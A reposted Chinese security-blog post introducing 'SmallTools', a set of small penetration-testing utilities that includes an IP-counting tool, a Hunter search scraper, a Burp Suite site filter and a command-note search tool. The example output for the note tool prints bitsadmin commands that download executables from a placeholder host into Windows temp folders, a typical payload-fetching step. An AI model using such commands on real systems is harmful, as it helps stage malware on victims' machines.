渗透测试小工具集 -- SmallTools

admin 2022年11月10日00:01:50安全工具评论26 views1397字阅读4分39秒阅读模式

===================================

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。

0x01 工具介绍

渗透测试小工具集,懒人必备神器!

渗透测试小工具集 -- SmallTools

0x02 安装与使用

1、getip
记录自己的出口IP

2、attacktop

攻击者IP次数统计在看golang,顺手就把之前的一些python改成golang了。这工具有个好处就在于统计出现次数,虽然Excel其实可以做得很好,但好多时候我连Excel都难得打开。把这工具添加环境变量,直接一条命令解决。

3、hunters

网上其实关于hunter的爬虫工具非常多,但不知道为啥总冥冥之中觉得不适合自己,所以造了这个轮子。
功能大体跟别的相似,并且只支持hunter,原因是fofa有ehole、360可以直接导出。我费那个劲集成在一起干啥,并且这些工具其实人家都做得挺不错。
hunters计划后头写成图形化的,别问为啥,有些时候命令行总觉得缺了点啥(单纯个人觉得)

4、WebFilter

Burpsuite代理的时候可以使用这部分过滤非常多的垃圾网站(包含一部分互联网企业,如果挖掘src的需要自行研判了)以此减轻BurpSuite被动扫描的压力。

5、Fs

年龄大了?记忆不好?就用fs
代码很简洁,需要自己简单修改下代码,没有很好做好适配。
把你常用且又爱忘记的一些命令放到use.log里,然后通过执行Linux命令来检索。
那么你只需要编译好这个工具以后直接fs admin,就可以检索admin相关的信息出来。
➜ ~ fs bitsadmin-+====================================+- 181 ➜ windows download[+]:bitsadmin /rawreturn /transfer getfile http://x.x.x.x:8888/tomcat.exe c:\users\Manager\AppData\Local\Temp 183 ➜ windows download[+]:bitsadmin /rawreturn /transfer down "http://127.0.0.1:8080/z.exe" c:\z.exe 259 ➜ bitsadmin /rawreturn /transfer getfile http://x.x.x.x/tomcat.exe c:\users\Manager\AppData\Local\Temp-+====================================+-

0x03 项目链接下载

1、通过阅读原文,到项目地址下载

2、关注公众号"web安全工具库",后台回复:20221110



· 推 荐 阅 读 ·

一本真正从漏洞靶场、项目案例来指导读者提高Web安全、漏洞利用技术与渗透测试技巧的图书。本书以新手实操为出发点,搭建漏洞靶场:解析攻防原理+详解攻防手法+构建完整攻防体系。本书从一开始便对Web开发基础和靶场搭建做了详细介绍,结合红日安全团队的漏洞挖掘和评估项目实战经验对各种实战技术进行分析,便于读者理解书中讲到的项目评估攻防案例的底层逻辑。

原文始发于微信公众号(Web安全工具库):渗透测试小工具集 -- SmallTools

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月10日00:01:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  渗透测试小工具集 -- SmallTools http://cn-sec.com/archives/1401352.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: